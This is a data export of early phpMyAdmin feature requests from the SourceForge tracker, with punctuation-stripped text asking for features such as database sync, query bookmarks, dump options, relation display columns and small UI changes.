I would like to be able to move copy update databases and tables from one server to the other Scenario 1 I want to move copy an entire database with without its contents from server A to server B and vice versa.
Scenario 2 I want to move copy an entire table with without its contents from server A to server B, and vice versa.
Scenario 3 I have 2 development servers with similar structures but not identical data.
I want to be able to move copy records from server A to server B, and vice versa.
Scenario 4 Refer Scenario 3.
I would like a synchronization feature also, meaning that a table must draw data from another similar) table on another server, and make the records look identical.
Quite a demand.
Thanks for a GREAT application!
Original URL https sourceforge.net p phpmyadmin feature requests 79 https sourceforge.net p phpmyadmin feature requests 79 Original author anonymous","enhancement"
"24444","4795","Add record link in browse view.
In browse view there is no add record link on top of a page.
It will be very helpfull.
Original URL https sourceforge.net p phpmyadmin feature requests 80 https sourceforge.net p phpmyadmin feature requests 80 Original author toszcze","enhancement"
"24444","4796","Disable Browse Select Empty when rows=0.
Hi, In Database view where you can see all tables) I would like to see that Browse, Select amp;amp; Empty are disabled if there are no rows in a table.
I m waiting for the next release ;) Bye Michael Metz Sysadmin SpeedPartner.de Original URL https sourceforge.net p phpmyadmin feature requests 127 https sourceforge.net p phpmyadmin feature requests 127 Original author greno2","enhancement"
"24444","4797","parameters in bookmarked query.
First off, great job on the latest version of phpmyadmin, Developer dudes.
It saves me a BUTTLOAD of time in my job.
Many thanks.
Using the bookmark feature, I have an idea that you all may have already thought of.
Re the amp;quot;bookmarked sql query amp;quot; dropdown box, would it be possible to put a text box next to it, and have a variable in the query that can be expanded according to what s in the box?
example bookmarked query select name,extra 1 from product where name like amp;quot; \{variable here\} amp;quot; textbox [value for variable here] my knowledge of php is minimal, and my time is even more minimal.
It may be something one of you wizzes could do in a second.
thanks again, and much success to you all.
jamie Original URL https sourceforge.net p phpmyadmin feature requests 82 https sourceforge.net p phpmyadmin feature requests 82 Original author anonymous","enhancement"
"24444","4798",".htaccess protection.
It would be nice for MyPHPAdmin can allow .htaccess creations.
Original URL https sourceforge.net p phpmyadmin feature requests 83 https sourceforge.net p phpmyadmin feature requests 83 Original author anonymous","enhancement"
"24444","4799","Export) results of SELECTs.
... as CSV similar to dump table) would be great Original URL https sourceforge.net p phpmyadmin feature requests 84 https sourceforge.net p phpmyadmin feature requests 84 Original author anonymous","enhancement"
"24444","4800","Select All checkbox.
A amp;quot;Select All checkbox amp;quot;, to select the tables to drop, would be very useful for those who can t drop a database and create another.
Original URL https sourceforge.net p phpmyadmin feature requests 86 https sourceforge.net p phpmyadmin feature requests 86 Original author anonymous","enhancement"
"24444","4801","Bookmarks stored message.
It should be possible to bookmark all statements that you type into the box, e.g.
amp;quot;SELECT ...INTO OUTFILE ... amp;quot; or amp;quot;INSERT ...SELECT...
amp;quot;.
Original URL https sourceforge.net p phpmyadmin feature requests 88 https sourceforge.net p phpmyadmin feature requests 88 Original author rod1603","enhancement"
"24444","4802","Create user and database for an ISP.
For each customer, we need to create user database user whitch can only acces to only one database In amp;quot;user and privileges amp;quot; option, you can create a amp;quot;quick user creation amp;quot;.
Only 3 fields in the form one for username, another for a checkbox like amp;quot;database name same as username amp;quot; and also a database name).
And 3 SQL query.
Thanks Perrich Original URL https sourceforge.net p phpmyadmin feature requests 89 https sourceforge.net p phpmyadmin feature requests 89 Original author anonymous","enhancement"
"24444","4803","Timer how fast is my SQLquery?.
How about adding a time function to see how fast a query executes?
A checkbox to enable output of amount of time used to push the query to the database and to get the response back from db.
If you check the checkbox then you also can get information from the MySQL amp;quot;EXPLAIN amp;quot; function... How about that?
regards Elias Original URL https sourceforge.net p phpmyadmin feature requests 90 https sourceforge.net p phpmyadmin feature requests 90 Original author blackline","enhancement"
"24444","4804","Clear button.
Hello, please add Clear Reset) button bellow each field, where is possible to edit SQL queries.
This will be very helpfull for Unix users, which have selected query in other window and will paste it into this not empty field by middle mouse button.
Regards, Tomas Polak Original URL https sourceforge.net p phpmyadmin feature requests 93 https sourceforge.net p phpmyadmin feature requests 93 Original author loskutak","enhancement"
"24444","4805","[2.3.0 CVS] In Advanced authentication forbid root.
In Advanced authentication I would like to forbid some users to log basicly the root user), and optionally to allow access for such forbidden) user from a list of addresses IPs) for now I have a very simple, but quite good I think realization in config.inc.php file I have added for example cfgServers[1][ forbid ][ root ] = |xxx.xxx.xxx.xxx||yyy.yyy.yyy.yyy| ; where root is the forbidden user and |xxx.xxx.xxx.xxx||yyy.yyy.yyy.yyy| is a list of IPs which are acceptable I hope you understand what I mean )) I will work on making, the list a little more flexable for example to make an entire network to the list.
I have an idea about that, but no idea how is better to describe a network 10.0.0. for example, or something else.
If you like my feature request and you are interested in my way of realization please inform me ceco noxis.net).
Original URL https sourceforge.net p phpmyadmin feature requests 94 https sourceforge.net p phpmyadmin feature requests 94 Original author cecot","enhancement"
"24444","4806","[config] Storing Server Configuration in Database.
Recieved from Roland Knall roland dot knall at web dot de) Hi Everyone First I want to excuse if this task has already been discussed.
I do not want to produce overhead ; ) I am working with PHP and MySQL all day long, and have to work with several customer databases.
Therefore I have every database in the config file.
Adding a new database is really inconvinient, and I simply hate the way it is done.
Not because it is not useful, but simply because I have to leave the Browser window.
After adding a 6th database this morning, I decided to do something against it.
Here is what I have done The Database configurations are being stored in a database table.
In the config.inc.php the cfgServer entries have been removed, instead some cfgDBServer entries have been written, to select the database in use.
Adv Auth entries can either be entered globally by setting cfgDBServer[ amp;quot;adv auth amp;quot;] or database specific by setting the corresponding database entry.
libraries common.lib.php has been expanded by adding a short starting at about line 300 ) If clause which checks for cfgDBServers being TRUE, unsetting cfgServer if this is the case, and reading the entries from the Database table.
Therefore existing configurations have to be proted to the database, I guess you could uncomment the unset cfgServers) statement without any problems, this was simply not what I wanted it to do.
Localization in the error messages is not being done by now, the errors occur in english.
I append the additions to common.lib.php and config.inc.php as diff against the current Release Candidate 2.2.2 rc1 ) version.
I do not know if it works against CVS, but should do so without any problems.
Keep me posted, if it works and what you think of it.
CU Roland Original URL https sourceforge.net p phpmyadmin feature requests 96 https sourceforge.net p phpmyadmin feature requests 96 Original author loic1","enhancement"
"24444","4807","Optimize table.
How to re order a table by id?
amp;quot;Optimize Table amp;quot; Consideration My first field is amp;quot;id amp;quot; which is an auto increment primary field.
Often users delete rows.
I have one researcher who had previously deleted a number of fields.
Now when the auto increment creates a new field, the id numbering goes screwy!
Number 16 for example has found itself at the beginning of her table, followed by 3,4,5,8,10 etc.
It would be useful to have something in Optimise Table or another function) to optimise a primary key, that is auto incremented, to re order the table.
It would be useful to have an automatic way of re numbering the complete table to re nuimber from 1 1650 number of fields I have).
Original URL https sourceforge.net p phpmyadmin feature requests 139 https sourceforge.net p phpmyadmin feature requests 139 Original author jtjohnston","enhancement"
"24444","4808","Remember SQL better.
2.2.4 is wonderful.
however the Show this query here again feature often doesn t. It would be nice if the Show this query here again check box would cause phpMyAdmin to permanently remember the query until it was overwritten with another.
Query string could be saved in a temp file and even carried from session to session.
Original URL https sourceforge.net p phpmyadmin feature requests 140 https sourceforge.net p phpmyadmin feature requests 140 Original author anonymous","enhancement"
"24444","4809","refresh.
could a refresh link be added at the right status frame), because refreshing the browser window will load the welcome page?
Original URL https sourceforge.net p phpmyadmin feature requests 99 https sourceforge.net p phpmyadmin feature requests 99 Original author anonymous","enhancement"
"24444","4810","Columns documentation.
In MySQL there is a comment field for the table, but no comment fields for each columns.
Maybe those comments could be stored in a table, like we store the bookmarks.
Original URL https sourceforge.net p phpmyadmin feature requests 101 https sourceforge.net p phpmyadmin feature requests 101 Original author lem9","enhancement"
"24444","4811","Add robots exclusion tags.
A search on Google for amp;quot;phpMyAdmin amp;quot; reveals that there a lot of phpMyAdmin installations are not properly secured.
Adding a amp;lt;meta name= amp;quot;robots amp;quot; content= amp;quot;noindex,nofollow amp;quot; amp;gt; to the HTML will at least prevent these installations from showing up in search engines that respect this tag), thus making them harder to find by malicious persons.
Original URL https sourceforge.net p phpmyadmin feature requests 103 https sourceforge.net p phpmyadmin feature requests 103 Original author c960657","enhancement"
"24444","4812","?)
GUI Querying tool.
I would really like to see a grphical querying tool.
the idea is to have drag and drop links and other such things.
Think amp;quot;Crystal Reports!
amp;quot; Original URL https sourceforge.net p phpmyadmin feature requests 104 https sourceforge.net p phpmyadmin feature requests 104 Original author tpros","enhancement"
"24444","4813","Blod edit.
Exactly what it says on the tin... being able to edit BLOBs would make my life easyier, and I imagine everyones else...
I don t really understand y it wasnt in place to start with?
Anyone?
any idea?
Cheers Scotter.
Original URL https sourceforge.net p phpmyadmin feature requests 107 https sourceforge.net p phpmyadmin feature requests 107 Original author anonymous","enhancement"
"24444","4814","Global search and replace.
To be able to replace a string in a specific table field.
Original URL https sourceforge.net p phpmyadmin feature requests 109 https sourceforge.net p phpmyadmin feature requests 109 Original author lem9","enhancement"
"24444","4815","Editing record no gt; cfgMaxRows.
Hello!
phpMyAdmin 2.2.3, Netscape 4.77 or IE 5.5) Whn I make browse to table and choose some row for editing then after submiting data browser will show contents of table again.
This is very good, but it works only if to look first cfgMaxRows records.
If to choose next page or to make some query then after finishing editing the browser returns page with properties of table.
So if cfgMaxRows is 50 then to edit step by step records 51, 52, 53.... you need to make several extra clicks Browse amp;gt;next page) Maybe it s possible to add in editing window choices amp;quot;do nt save changes amp;quot; and amp;quot;continiue editing with next record amp;quot;.... Another thing.
Is it possible to get rid of function cell in editing table.
If I had 20 fields then it is quite boring to press 39 times [tab] key or eaven worse to point 20 times with mouse.
This shold be user dependent to say once I dont t want function and during this session there is only some kind checkboxs to allow it again) in cases it s very usefull.
Original URL https sourceforge.net p phpmyadmin feature requests 110 https sourceforge.net p phpmyadmin feature requests 110 Original author anonymous","enhancement"
"24444","4816","Option to avoid display of query.
When uploading a big file with lots of records, it s annoying to show the query at the top of the page.
We already have a checkbox to avoid the redisplay of the query on the query box, could we add another one to avoid the one at the top?
Original URL https sourceforge.net p phpmyadmin feature requests 111 https sourceforge.net p phpmyadmin feature requests 111 Original author lem9","enhancement"
"24444","4817","No quot;xxxtext quot; button on vertical mode.
Not really a bug, but I noticed that the fulltext partialtext button is not visible in vertical browse mode 2.2.4 cvs 20020111); btw Pma remembers the state where it s in partial or full) when switching from horizontal to vertical.
Original URL https sourceforge.net p phpmyadmin feature requests 113 https sourceforge.net p phpmyadmin feature requests 113 Original author hal0802","enhancement"
"24444","4818","Optimize all tables.
Sometimes tables get that red amp;quot;Overhead amp;quot; word near Space Usage informations.
Browsing table by table looking for overheaded tables is annoying.
A little snippet could be added to optimize all tables tables = mysql list tables database name ); while list table name) = mysql fetch array tables)) \{ sql = amp;quot;OPTIMIZE TABLE table name amp;quot;; mysql query sql) or exit mysql error )); \} Original URL https sourceforge.net p phpmyadmin feature requests 114 https sourceforge.net p phpmyadmin feature requests 114 Original author inerte","enhancement"
"24444","4819","Why not add a php dump.
Why not add a php dump that save the database in a php file and when you run it, it automaticely restor the data base Original URL https sourceforge.net p phpmyadmin feature requests 115 https sourceforge.net p phpmyadmin feature requests 115 Original author anonymous","enhancement"
"24444","4820","Read compressed dump.
It could be interristing to auto decompresse dump when reading it Original URL https sourceforge.net p phpmyadmin feature requests 116 https sourceforge.net p phpmyadmin feature requests 116 Original author anonymous","enhancement"
"24444","4821","Dump) automatic dump with webcron.
It could be interresting to allow saving database each week with some service like webcron which can run script every x days.
I have already modified the dump file to do this and it work, but I don t post my modification here because my code is not very clean.
Original URL https sourceforge.net p phpmyadmin feature requests 117 https sourceforge.net p phpmyadmin feature requests 117 Original author anonymous","enhancement"
"24444","4822","Backup program.
Let you easely make backup s and recover them.
Original URL https sourceforge.net p phpmyadmin feature requests 150 https sourceforge.net p phpmyadmin feature requests 150 Original author anonymous","enhancement"
"24444","4823","Support for auth digest.
Actually the suported mode for autentication is basic, as you know all passwords travel unencrypted, you can avoid this setting up phpmysql under https or using auth digest mode, where password travel encrypted.
[ auth type ] = digest Thanks Original URL https sourceforge.net p phpmyadmin feature requests 118 https sourceforge.net p phpmyadmin feature requests 118 Original author anonymous","enhancement"
"24444","4824","Hard charset.
Possibility of configure hard charset on right frame.
By example charset= amp;quot;win1251 amp;quot; Original URL https sourceforge.net p phpmyadmin feature requests 151 https sourceforge.net p phpmyadmin feature requests 151 Original author anonymous","enhancement"
"24444","4825","query printing.
Hello, It would be nice to have better ability to print queries.
Because at this time if row have a lot of columns, only data which fits to page width can be printed, rest of displayed data is being cut.
It would be nice to be able to print the data from each row on the separate page.
For example Query displays 45 rows.
Print all of this rows on separate pages each, in vertical view format.
Thank you.
Yevgeniy Original URL https sourceforge.net p phpmyadmin feature requests 120 https sourceforge.net p phpmyadmin feature requests 120 Original author anonymous","enhancement"
"24444","4826","Password protect interface.
The addition of phpmyadmin password protection would be great, just something simple to stop people from accessing the interface without authority.
Original URL https sourceforge.net p phpmyadmin feature requests 121 https sourceforge.net p phpmyadmin feature requests 121 Original author anonymous","enhancement"
"24444","4827","Operations) Append data to database.table.
Would be useful, of course the tables must have the same structure.
Original URL https sourceforge.net p phpmyadmin feature requests 122 https sourceforge.net p phpmyadmin feature requests 122 Original author lem9","enhancement"
"24444","4828","Option in config to disable javascript.
I m talking about the Javascript mouseover states for table cell colors.
I personally find these very difficult to deal with, and they slow down my browser considerably Linux Mozilla).
I like the hover states for links css) but could we please disable or get rid of entirely the mouseovers.
If you really want them, use stylesheets css2) to do it and lay off the javascript.
Original URL https sourceforge.net p phpmyadmin feature requests 123 https sourceforge.net p phpmyadmin feature requests 123 Original author clnelson","enhancement"
"24444","4829","enable disable functions fields.
Hello, It would be nice to include some feature for enabling and disabling functions fields in edit form.
phpMyAdmin is one of candidates for use as our bug tracking system and I ve been asked by my boss if i can remove functions fields to simplify enter data and view of existing data Thank you.
Yevgeniy Original URL https sourceforge.net p phpmyadmin feature requests 124 https sourceforge.net p phpmyadmin feature requests 124 Original author lem9","enhancement"
"24444","4830","improvement of template tbl change.php.
When data is entered in a fields that is marked to possibly be null, the checkbox in the coloumn amp;quot;NULL amp;quot; should be unchecked.
Otherwise the submitted data in this field will be lost.
Original URL https sourceforge.net p phpmyadmin feature requests 125 https sourceforge.net p phpmyadmin feature requests 125 Original author anonymous","enhancement"
"24444","4831","OnClick for comfortable data editing.
In a result table generated by sql.php there is a hover implemented, that highlights the data row.
cut amp;lt;tr onmouseover= amp;quot;setPointer this, CCFFCC ) amp;quot; onmouseout= amp;quot;setPointer this, DDDDDD ) amp;quot; amp;gt; My idea is to implement an onClick, that leads to the edit mask for this database entry tbl change.php) analog in the same manner as the amp;quot;edit amp;quot; button.
I am aware, that this only works with newer browsers Internet Explorer amp;gt;3), but this would be comfortable for editors.
Original URL https sourceforge.net p phpmyadmin feature requests 126 https sourceforge.net p phpmyadmin feature requests 126 Original author j seibert","enhancement"
"24444","4832","browse from left frame.
I would very much like the option to browse a table from the link in the left frame instead of listing the properties of the table.
I guess this would have to be either a config time option for all users or maybe some sort of toggle once logged in.
Original URL https sourceforge.net p phpmyadmin feature requests 128 https sourceforge.net p phpmyadmin feature requests 128 Original author susfour","enhancement"
"24444","4833","Dump) saving dumps on the server.
on backing up large dbs amp;gt;7mb) and downloading them somehow the process interrupts after a couple of megs.
if this is a common problem it could be useful to have the possibility of saving the db on the server instead of only being able to download it thanks for your attention adrien Original URL https sourceforge.net p phpmyadmin feature requests 129 https sourceforge.net p phpmyadmin feature requests 129 Original author anonymous","enhancement"
"24444","4834","server overview.
How about a server overview screen simular to the database overview, where the user can see all databases he has access to on a server listed in a table.
Here, one could see on first look perhaps the size of the databases, the number of their tables.
I think this would be a useful feature.
Rabus Original URL https sourceforge.net p phpmyadmin feature requests 130 https sourceforge.net p phpmyadmin feature requests 130 Original author rabus","enhancement"
"24444","4835","Relation) specify field displayed.
It would be great if there were another field in the relation table that specified which field in the destination table were displayed.
e.g.
When linking two people id s, it would be more helpful to see the person name instead of the id.
I added a column called disp dest column to my relation table, and added edited this code in libraries display tbl.lib.php3 file, and it seems to work.
Not perfect, but it s a start.
when getting the relation map local query = SELECT src column, dest table, dest column, disp dest column .
FROM .
cfgServer[ relation ] .
WHERE src table IN .
tabs; result = mysql query local query); if result) \{ while rel = mysql fetch row result)) \{ map[ rel[0]] = array rel[1], rel[2], rel [3]); \} \} when displaying row values dispsql = SELECT .
map[ primary amp;gt;name][2] .
FROM .
PMA backquote map[ primary amp;gt;name][0]) .
WHERE .
map[ primary amp;gt;name][1] .
= .
row [ pointer]; dispresult = mysql query dispsql); if dispresult) \{ disprow = mysql fetch row dispresult); dispval = disprow[0]; \} else \{ dispval = row[ pointer]; \} vertical display[ data ][ foo][ i] .= amp;lt;a href= amp;quot;sql.php3?
.
lang= .
lang .
amp;amp;amp;server= .
server .
amp;amp;amp;db= .
urlencode db) .
amp;amp;amp;table= .
urlencode map[ primary amp;gt;name][0]) .
amp;amp;amp;pos=0 amp;amp;amp;session max rows= .
session max rows .
amp;amp;amp;dontlimitchars= .
dontlimitchars .
amp;amp;amp;sql query= .
urlencode SELECT FROM .
PMA backquote map[ primary amp;gt;name][0]) .
WHERE .
map[ primary amp;gt;name][1] .
= .
row [ pointer]) .
amp;quot; amp;gt; .
dispval .
amp;lt; a amp;gt; ; It would also be great if when editing a row with relations, a SELECT menu would be displayed with the disp dest column values instead of a text input.
Original URL https sourceforge.net p phpmyadmin feature requests 159 https sourceforge.net p phpmyadmin feature requests 159 Original author anonymous","enhancement"
"24444","4836","ability to save oft used queries.
It would be nice to have an easy way of saving queries IN phpmyadmin, instead of having to save the ones you use frequently in a completely separate text file, and just copy and paste them in.
it would be nice if phpmyadmin handled this with its own store of queries you can enter and recall.
this probably shouldn t be a real database table in mysql, because then only certain users would be able to use it.
Original URL https sourceforge.net p phpmyadmin feature requests 131 https sourceforge.net p phpmyadmin feature requests 131 Original author ellisonch","enhancement"
"24444","4837","Bigger Changeble Text Boxes.
I m probably not the only one with this problem, I use phpmyadmin for editing html in the text boxes.
However, they are a bit small for this purpose.
Can there be a sort of expand button above the form, which broadens the text boxes if clicked.
Original URL https sourceforge.net p phpmyadmin feature requests 132 https sourceforge.net p phpmyadmin feature requests 132 Original author anonymous","enhancement"
"24444","4838","Wildcard db privileges.
In the user management panel, there is a drop down to select the db.
Because of this drop down, we cannot directly enter a wildcard db, for example username Original URL https sourceforge.net p phpmyadmin feature requests 133 https sourceforge.net p phpmyadmin feature requests 133 Original author lem9","enhancement"
"24444","4839","LIMIT 0, 30 removal.
Please consider the following in future releases.
Add as line 718 of tbl properties.php amp;lt;input type= amp;quot;checkbox amp;quot; name= amp;quot;addlimit amp;quot; checked amp;gt;Add LIMIT 0, 30 amp;lt;br amp;gt; .. and replace lines 219 224 of sql.php with if addlimit == on) \{ This will place a checkbox under the textarea that, when checked default), adds limit to your sql query and when unchecked leaves the query as is.
Original URL https sourceforge.net p phpmyadmin feature requests 161 https sourceforge.net p phpmyadmin feature requests 161 Original author anonymous","enhancement"
"24444","4840","Relation) wish list.
The new feature is very great !
May I ask for little new feature.
In the table server[relation] it should be possible to store some more information such as Which field should be shown default is ) maybe some are not interesting ) Should the link open a new window or not default no) Should the result should be vertical or horizontal, because when there is one line it better to have vertical view default is horizontal) Thanks for your work Original URL https sourceforge.net p phpmyadmin feature requests 134 https sourceforge.net p phpmyadmin feature requests 134 Original author anonymous","enhancement"
"24444","4841","Sorting of field type.
hello, IMO the most field used types is varchar andthen tiny) int amp;gt; please put them on first place in the select box or even better as the default selected value.
thank you Albrecht Original URL https sourceforge.net p phpmyadmin feature requests 163 https sourceforge.net p phpmyadmin feature requests 163 Original author guenther","enhancement"
"24444","4842","User creation question.
When creating a new user, why don t you use a GRANT USAGE ON ... instead of a INSERT INTO ... ?
This would avoid having to reload mysql before the user is active.
Am I wrong ?
Original URL https sourceforge.net p phpmyadmin feature requests 135 https sourceforge.net p phpmyadmin feature requests 135 Original author anonymous","enhancement"
"24444","4843","Print view in browse mode.
I m using phpMyAdmin 2.2.4 and I can t find any print view option when browsing a table...
I dunno if I m crazy or what, but I thought this option was accessible in older version.
Whatever, it would be nice to have a amp;quot;print view amp;quot; at this place.
Original URL https sourceforge.net p phpmyadmin feature requests 136 https sourceforge.net p phpmyadmin feature requests 136 Original author anonymous","enhancement"
"24444","4844","Auto extention.
You should realy make the extention configurable make a file called extention.inc the only thing it would contain is phpEx = php ; the user can change php to what ever they want and then change the actual file extentions to match and it will work this should make it so you dont have to keep realeasing a php and a php3 version and make it easy on me to use php4 as my host wont set php to parse only php4 and php3 Original URL https sourceforge.net p phpmyadmin feature requests 137 https sourceforge.net p phpmyadmin feature requests 137 Original author digitalxero","enhancement"
"24444","4845","Database list too large.
I think the left frame need be remake.
The page will be too large when you have a lot of databases and table.
Maybe a config option slipt databases = TRUE; Will split the frame by Letter with the option to show all databases.
If you click on Letter amp;quot;B amp;quot; will show \ barkel \ bakelr \ bakrk If you click on Link amp;quot;ALL amp;quot; will show \ alsms \ barkel \ bakelr \ bakrk \ calala Reggards.
Original URL https sourceforge.net p phpmyadmin feature requests 138 https sourceforge.net p phpmyadmin feature requests 138 Original author darkelder","enhancement"
"24444","4846","Run sql file without local file upload.
My shared host has disabled php file upload.
This means I cannot upload and execute a local sql file from within phpMyAdmin.
Is it possible to specify the sql file location as a text file on the host.
I could then ftp the sql file to the host and run as normal.
Roger Original URL https sourceforge.net p phpmyadmin feature requests 141 https sourceforge.net p phpmyadmin feature requests 141 Original author anonymous","enhancement"
"24444","4847","Sort your query by an index.
It would be nice to be able to sort your query with one of your index s. Original URL https sourceforge.net p phpmyadmin feature requests 142 https sourceforge.net p phpmyadmin feature requests 142 Original author billen","enhancement"
"24444","4848","Foreign Keys for InnoDB Tables.
Foreign key checking was added for innoDB tables in MySQL 3.23.44...
It would be great if we could do the REFERENCES from a dropdown when creating these.
Or if this is a stupid idea please feel free to tell me why.)
Original URL https sourceforge.net p phpmyadmin feature requests 143 https sourceforge.net p phpmyadmin feature requests 143 Original author anonymous","enhancement"
"24444","4849","Servername in left.php.
I like to have the Servername in left.php left frame) straight behind Home .
I just patched left.php of 2.2.5rc1 see atachement), so if you like to, put it into the next release.
Original URL https sourceforge.net p phpmyadmin feature requests 144 https sourceforge.net p phpmyadmin feature requests 144 Original author anonymous","enhancement"
"24444","4850","Add field number to table properties.
When displaying the properties of a table it would be nice to see the field displayed for each field.
Original URL https sourceforge.net p phpmyadmin feature requests 145 https sourceforge.net p phpmyadmin feature requests 145 Original author anonymous","enhancement"
"24444","4851","Tab Index Order.
I would be nice if the Tab Index Order in the tbl change.php adding a new record) would allow to simply enter all the values via tab, so saying that TAB always jumps to the next value field and not to the next field which is the function field pull down at the moment) ... this would allow faster and more easy entering of data for records with 10 fields ... should be done via amp;lt;input type... tabindex= amp;quot;xx amp;quot; amp;gt; xx = values 0 32768) tried it with NS6.01 IE5.5 works there ... thx Original URL https sourceforge.net p phpmyadmin feature requests 146 https sourceforge.net p phpmyadmin feature requests 146 Original author thebelgarion","enhancement"
"24444","4852","Not allowing reserved words for tables.
It might happen to an user to try to use a mysql reserved word as a table name, thus thereafter having problems adding records to the table.
It would be a nice improvement to verify if the table name added by the user for new table creation is not among the reserved words, thus preventing this kind of mistake.
I m available for further details, Jak jak axura.com Original URL https sourceforge.net p phpmyadmin feature requests 147 https sourceforge.net p phpmyadmin feature requests 147 Original author anonymous","enhancement"
"24444","4853","query generator to paste into PHP source.
i think that is would be a nice addition to phpMyAdmin.
Just a link that when you click on it, it generates the three types of queries for you.
the way that it would work is the field names are also the varialble names ex update session set sessionhash = sessionhash where id = id Original URL https sourceforge.net p phpmyadmin feature requests 148 https sourceforge.net p phpmyadmin feature requests 148 Original author sidhighwind","enhancement"
"24444","4854","show optimalcolumn types.
hi, it would be nice to be able to ask mysql if the columntypes are ok.
This could be simply a link from the tbl properties page to sql.php which will use the syntax select from tablename procedure analyse ); Original URL https sourceforge.net p phpmyadmin feature requests 172 https sourceforge.net p phpmyadmin feature requests 172 Original author mikebeck","enhancement"
"24444","4855","Relation) and Query by Example.
Hi, It would be nice to see an option to change the database where the relation table resides.
I liked it that the bookmarks table could be in a different database because I could keep all the extras for phpMyAdmin outside of my data.
Can this be done?
Thanks for some great software!
Note I support exporting the results of the queries to a file as well for download, most likely a CSV file.
I know it would help around here.
Original URL https sourceforge.net p phpmyadmin feature requests 149 https sourceforge.net p phpmyadmin feature requests 149 Original author grapeice925","enhancement"
"24444","4856","Flexible internationalisation.
Hi, I often use phpMyAdmin and me much comfortabile when interface of the program is English, but many bases which I manage from phpMyAdmin contains the russian words which accordingly at english coding are displayed incorrect.
It s problem cold be solved if was possible hard expose codingpage for right frame in WIN1251.
Possible add such feature in config.inc.php?
For example HardCodingRightFrame = amp;quot;WIN1251 amp;quot;; Thanks. )
Original URL https sourceforge.net p phpmyadmin feature requests 152 https sourceforge.net p phpmyadmin feature requests 152 Original author bdenis","enhancement"
"24444","4857","Dump) Allow schema dumps to separate files.
When doing a database schema dump to a file or zipped file), it would be helpful to have the ability to retrieve the files on a one file per table basis.
This would help break up the data into more manageable sizes, and confer the following advantages Since these dumps serve as a good way to backup restore databases, it helps organize the backups.
Really large files may not upload within the standard 30 second PHP page timeout, so breaking it down this way would be helpful.
Of course, if the system is generating multiple files for the dump, it will need to zip them all up so that it can be retrieved as one download by the user.
Thanks for writing such a great product.
It s been my standard against which all other PHP applications are judged.
Steve Estes destes ix.netcom.com ICQ 6854118 Original URL https sourceforge.net p phpmyadmin feature requests 153 https sourceforge.net p phpmyadmin feature requests 153 Original author anonymous","enhancement"
"24444","4858","relation add quot;display column quot; column.
the relation system should allow one to specify a display column, which would replace the column in the source table with data from a column in the destination table.
For example, if I have amp;quot;person amp;quot; table and a amp;quot;request amp;quot; table, request.person id would be related to person.id .
However, when displaying rows from the amp;quot;request amp;quot; table, it would be much more useful to display the person s name in place of the request.person id field, which would require a lookup in the person table.
Also, this could be used to create a popup menu of choices when creating a for example) amp;quot;request amp;quot; record it would show all the possible people s names in a listbox or a popup rather than making the user go figure out what the ID number for the desired person is first.
Original URL https sourceforge.net p phpmyadmin feature requests 154 https sourceforge.net p phpmyadmin feature requests 154 Original author anonymous","enhancement"
"24444","4859","config file suggestion.
i think that a default config line like this would be more useful cfgPmaAbsoluteUri = http .
HTTP SERVER VARS[ HTTP HOST ].
phpmyadmin ; i use phpmyadmin through ssh tunnels and i d guess other people might do similar things).
i also share a copy of phpmyadmin among multiple servers.
i don t know if the variable i used is the best one, but it seems to work on the multiple versions of php i have to deal with.
Original URL https sourceforge.net p phpmyadmin feature requests 155 https sourceforge.net p phpmyadmin feature requests 155 Original author anonymous","enhancement"
"24444","4860","Relation) drop down for foreign keys in 2.3.1).
Add in the relationtable a field display choices y n) In record view of the master table, if display choices = y for a foreign key, display the choices in a drop down.
We display the key, and if a display foreign field is defined, we also display the display foreign field.
Original URL https sourceforge.net p phpmyadmin feature requests 176 https sourceforge.net p phpmyadmin feature requests 176 Original author lem9","enhancement"
"24444","4861","?)
display number of columns.
it would be better if exist an column whith the number of columns for each table in the db index page Original URL https sourceforge.net p phpmyadmin feature requests 177 https sourceforge.net p phpmyadmin feature requests 177 Original author anonymous","enhancement"
"24444","4862","Translation feedback link.
It should be made easier for users to give feedback on the translations.
The front page of phpMyAdmin could contain a link with instructions on how to contact the person who has made the translation.
This piece of HTML should be in the language file and its content should be decided by the translator.
For example, my Finnish translation could contain something like amp;quot;Errors in translation?
Don t hesitate to contact the Finnish translator Visa Kopu, visa visakopu.net.
amp;quot; If someone of the translators doesn t want to get his mailbox flooded with comments, he could leave the variable empty or only provide link to phpmyadmin.net.
What do you think?
Visa Original URL https sourceforge.net p phpmyadmin feature requests 156 https sourceforge.net p phpmyadmin feature requests 156 Original author anonymous","enhancement"
"24444","4863","left frame table selection by prefix.
hi guys, a nice feature would be the option to display only tables in the left frame which include a runtime definable prefix.
this is good if you have various pages on the same server and only own one mysql database.
so you have to use, for example homepage1 newstable and so on, to correctly define the tables.
and this results in a real problem if you have about 180 tables in the left frame ) so it would be nice to have a text box at the top of the left frame where you can define this prefix or maybe postfix).
thanx in advance Original URL https sourceforge.net p phpmyadmin feature requests 157 https sourceforge.net p phpmyadmin feature requests 157 Original author anonymous","enhancement"
"24444","4864","add quot;reload database quot; button on mysql db.
when working on the admin database mysql), add a button amp;quot;reload db amp;quot; on the db propr page.
quicker than having to click on amp;quot;home amp;quot; and reload everything from there...
Original URL https sourceforge.net p phpmyadmin feature requests 158 https sourceforge.net p phpmyadmin feature requests 158 Original author swix","enhancement"
"24444","4865","add lt;label gt; for checkbox radio button.
just few suggestion.
add amp;lt;label amp;gt; for the checkbox radio button text for easily to click.
Original URL https sourceforge.net p phpmyadmin feature requests 160 https sourceforge.net p phpmyadmin feature requests 160 Original author anonymous","enhancement"
"24444","4866","dump) Dump all DBs.
Would be nice to be able to dump data schema for all DBs on the system into one compressed file for quick backups prior to, for instance, server updates.
Original URL https sourceforge.net p phpmyadmin feature requests 162 https sourceforge.net p phpmyadmin feature requests 162 Original author tsitzlar","enhancement"
"24444","4867","vertical column headings.
hi what I really miss are vertical field descriptions, especially in the usual browse mode.
most of my values are short) numbers and therefore the column widths are determined by their names.
the result is wide screens resp.
many sheets of paper with lots of empty space very hard to read sometimes.
my suggestions o how about an option to put a amp;lt;br amp;gt; or something like that html?
never been there....) after each letter of the field name?
o or to rotate them 90 deg.?
o or be able to choose the very small ) font size?
thanks!
klauz Original URL https sourceforge.net p phpmyadmin feature requests 164 https sourceforge.net p phpmyadmin feature requests 164 Original author klauzhauz","enhancement"
"24444","4868","Delete Multiple Rows.
It would be nice to select multiple rows by a check box) and delete them once by pressing a delete button.
Now you have to pass all the rows separately.
Original URL https sourceforge.net p phpmyadmin feature requests 182 https sourceforge.net p phpmyadmin feature requests 182 Original author anonymous","enhancement"
"24444","4869","Importing SQL statements from local file.
I tried to implement the possibility to import SQL statements from a file local to the webserver.
